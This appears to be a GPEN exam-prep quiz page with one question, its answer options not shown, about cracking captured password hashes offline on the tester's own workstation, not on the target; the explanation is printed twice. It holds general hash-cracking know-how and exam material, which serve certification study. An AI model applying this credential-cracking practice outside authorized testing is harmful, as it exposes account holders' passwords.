What is the recommended practice when handling password hashes during a pentest to avoid impacting the target system?

Study for the SANS560 GIAC Penetration Tester (GPEN) Test. Study with flashcards and multiple choice questions, each question has hints and explanations. Get ready for your exam!

Multiple Choice

What is the recommended practice when handling password hashes during a pentest to avoid impacting the target system?

Explanation:
Handling password hashes during a pentest should be done offline on a dedicated workstation to avoid affecting the target system. Cracking hashes on the target host uses its CPU and I/O, which can degrade performance, cause outages, or trigger security alarms, and it risks altering the system state or complicating incident handling. By moving the hashes to your own machine and cracking them there, you keep the target environment pristine, reduce the risk of disruption, and maintain a clear audit trail. It also ensures the originals remain unmodified on the target, preserving evidence and chain of custody while you perform analysis in a controlled, repeatable manner.

Handling password hashes during a pentest should be done offline on a dedicated workstation to avoid affecting the target system. Cracking hashes on the target host uses its CPU and I/O, which can degrade performance, cause outages, or trigger security alarms, and it risks altering the system state or complicating incident handling. By moving the hashes to your own machine and cracking them there, you keep the target environment pristine, reduce the risk of disruption, and maintain a clear audit trail. It also ensures the originals remain unmodified on the target, preserving evidence and chain of custody while you perform analysis in a controlled, repeatable manner.

More Multiple Choice Questions
Subscribe

Get the latest from Passetra

You can unsubscribe at any time. Read our privacy policy